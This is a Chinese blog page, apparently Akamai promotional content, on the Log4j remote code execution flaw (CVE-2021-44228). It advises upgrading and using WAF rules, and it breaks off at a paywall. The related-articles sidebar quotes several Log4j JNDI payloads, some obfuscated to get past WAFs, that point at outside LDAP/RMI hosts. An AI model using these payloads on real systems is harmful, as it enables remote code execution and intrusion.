Log4j远程代码执行漏洞,通过 WAF 防护

最新推荐文章于 2023-11-04 01:10:01 发布
最新推荐文章于 2023-11-04 01:10:01 发布
阅读量2.7k 收藏
点赞数
分类专栏: Akamai安全 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yuri_cyber/article/details/122232712
版权
Apache Log4j 的远程代码执行漏洞引发安全危机,影响广泛。Akamai 云端防护引擎在硬件WAF厂商升级前即提供防护,建议客户升级至2.15.0或更高版本。Kona Rule Set、Automated Attack Groups和Adaptive Security Engine等产品已部署相关规则,客户激活DENY模式即可获得保护。
摘要由CSDN通过智能技术生成

 

12月10日,Apache Log4j 的远程代码执行漏洞(CVE-2021-44228)引发了 Web 应用安全界的震动。Akamai 全球安全服务中心和本地的安全服务团队及时响应了这次安全事件,在很多硬件 WAF 厂家还忙于升级补丁和规则的时候,Akamai 的云端防护引擎已经为客户防御了安全攻击,给客户争取更多的时间去升级系统。

 

影响范围

作为一款开源的日志记录工具,Apache Log4j 已被包含在众多流行的框架中(包括但不限于 Apache Struts2、Apache Solr、Apache Druid、Apache Flink),这也使得该漏洞的影响力被近一步扩大。

据悉,从2.0到2.14.1版本的 Log4j 均会受此漏洞影响。

应对措施

建议受影响的 Akamai 客户立即升级 Log4j 至2.15.0或后续版本

如因任何原因暂时无法升级,或担心在升级过程中遭受攻击,也可通过 Akamai 一系列WAF 产品自动更新的规则获得保护并缓解漏洞产生的影响。

在漏洞公开后的24小时内&#x

最低0.47元/天 解锁文章
网络出海
关注
专栏目录
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1430
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
log4j RCE waf 绕过技巧
weixin_50464560的博客
07-09 1702
log4j waf 绕过技巧 - ph4nt0mer - 博客园 (cnblogs.com)原来的poc: Copy绕过的poc: Copy可行 Copy不一定可行 Copy可行unico字符串下列表达式均等价于abc: Copylog4j poc集合 https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis● 不出现port,避免被waf匹配ip:port Copy
如何跟踪log4j漏洞原理及发现绕WAF的tips
HBohan的博客
12-21 1688
log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips
WEB安全Log4j Bypass WAF Payloads
qq_42322144的博客
12-14 6050
Log4j Bypass WAF Payloads ${jndi:ldap://127.0.0.1:1389/ badClassName} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${jndi:rmi:
信息安全-史诗级漏洞Log4j漏洞机理和防范措施
码者人生的技术博客
12-31 6137
信息安全-史诗级漏洞Log4j漏洞机理和防范措施及对安全能力建设的思考
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
如何强化应用安全能力,全面拦截 Log4j 漏洞攻击
yz_weixiao的博客
01-16 309
最近几天对于很多开发者而言,只能用争分夺秒与胆战心惊来形容。而造成这一切的源头,来自于被公布的 Apache Log4j2 远程代码执行漏洞(CNVD-2021-95914)。当前几乎所有技术巨头都在使用该开源组件,其危害将带来一连串连锁反应。据行业机构不完全统计,该漏洞影响 6w+ 流行开源软件,影响 70% 以上的企业线上业务系统!漏洞波及面、危害程度均堪比 2017 年的让数百万台主机面临被勒索病毒攻击的风险的“永恒之蓝”漏洞
漏洞研究》Apache Log4j2 远程代码执行漏洞
最新发布
1
11-04 1719
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码
Apache Log4j2 远程代码执行漏洞 排查及修复
m0_48368237的博客
12-23 1960
近期,Apache Log4j2 远程代码执行漏洞(CNVD-2021- 95914)曝光,引发社会广泛关注。攻击者利用该漏洞,可 在未授权的情况下远程执行代码,获得服务器控制权限。经 中心综合技术分析研判,该漏洞具有危害程度高、利用难度 低、影响范围大的特点。 一、漏洞情况分析 Apache Log4j 是一个基于 Java 的日志记录组件。Apach e Log4j2 是 Log4j 的升级版本,通过重写 Log4j 引入了丰富 的功能特性。该日志组件被广泛应用于业务系统开发,用以 记录程序输入输出日志
腾讯云容器安全已支持检测Apache Log4j2漏洞
YDclub的博客
12-10 3550
犀引擎发现数万镜像受该漏洞影响,免费试用中
突发!Log4j 爆“核弹级”漏洞Flink 等项目受影响,提供 Flink 解决方法,赶紧修!...
http://www.54tianzhisheng.cn/
12-11 689
昨天,你应急了吗?昨晚,对很多程序员来说可能是一个不眠之夜。12 月 10 日凌晨,Apache 开源项目 Log4j远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏...
Flink等多组件受影响,Apache Log4j曝史诗级漏洞
热门推荐
mengyidan的专栏
12-10 1万+
全球知名开源日志组件Apache Log4j 被曝存在严重高危险级别远程代码执行漏洞,攻击者可以利用该漏洞远程执行代码。 目前受漏洞影响的主要是Apache Log4j 2.x <= 2.14.1版本,当用户使用Apache Log4j2来处理日志时,漏洞会对用户输入的内容进行特殊处理,攻击者便可以在Apache Log4j2 中构造特殊请求来触发远程代码执行。 如何判断是否受影响,开发者只需排查在Java应用中是否引入 log4j-api , log4j-core 两个jar文件,若存在,建议立即
Flink1.14.2发布,除了log4j漏洞你还需要关注什么?
华章IT官方博客
01-04 646
Flink1.14.2 Release版本已经、发布,主要是修复了Log4j导致的可执行任意代码漏洞问题,但是还有一些非常重要的功能更新。我挑了其中比较重要的列出来。flink-puls...
log4j漏洞产生方法和预防
Koikoi12的博客
12-13 4143
产生方法 https://0xsapra.github.io/website/CVE-2019-17571 核心部分${jndi:ldap://xxxxx.dnslog.cn/exp} 想办法把用户输入的可执行字符串送到这个位置就行了,日志里经常打印请求参数之类用户输入的内容,比如"参数a:<请求的输入 预防 Apache Log4j 远程代码执行漏洞 影响版本 经验证 2.15.0-rc1 版本存在绕过,实际受影响范围如下: Apache Log4j 2.x < 2.15.0-rc2 安全
Log4j2 Zero Day 漏洞 Apache Flink 应对指南(二)
Ververica的博客
12-21 567
▼ 关注「Apache Flink」,获取更多技术干货▼摘要:有关 Apache Log4j 的一个新的漏洞问题被提出,本文主要阐述 CVE-2021-45105 的细节和影响,并给出新...
Log4j2远程代码执行漏洞修复
whandgdh的博客
05-06 1391
log4j存在JNDI注入缺陷。flink服务log4j漏洞修复
严重危害警告 Log4j 执行漏洞被公开
qq_53058639的博客
02-14 1216
12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。Log4j 是目前全球使用最广泛的 java 日志框架之一。
iis远程代码执行漏洞
05-15
IIS(Internet Information Services)是Windows操作系统中的Web服务器,它在Web应用程序开发和部署中扮演着重要的角色。然而,IIS也存在一些安全漏洞,其中包括远程代码执行漏洞远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者可以通过远程方式在目标服务器上执行任意代码,从而控制受害者服务器。IIS远程代码执行漏洞是指攻击者可以通过HTTP或FTP等协议向IIS服务器发送恶意请求,从而触发漏洞执行任意代码。 IIS远程代码执行漏洞的原因主要是由于IIS在处理某些特定类型的请求时存在漏洞,攻击者可以通过构造恶意请求来利用这些漏洞,最终导致代码执行。 为了防止IIS远程代码执行漏洞的攻击,建议管理员采取以下措施: 1.升级IIS服务器到最新版本,及时安装最新的安全补丁。 2.限制IIS服务器的访问权限,只允许授权的用户或IP地址访问。 3.使用Web应用程序防火墙(WAF)来监控和阻止恶意请求。 4.禁用不必要的IIS模块和功能。 5.使用安全编程实践来编写Web应用程序代码,避免代码注入漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络出海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值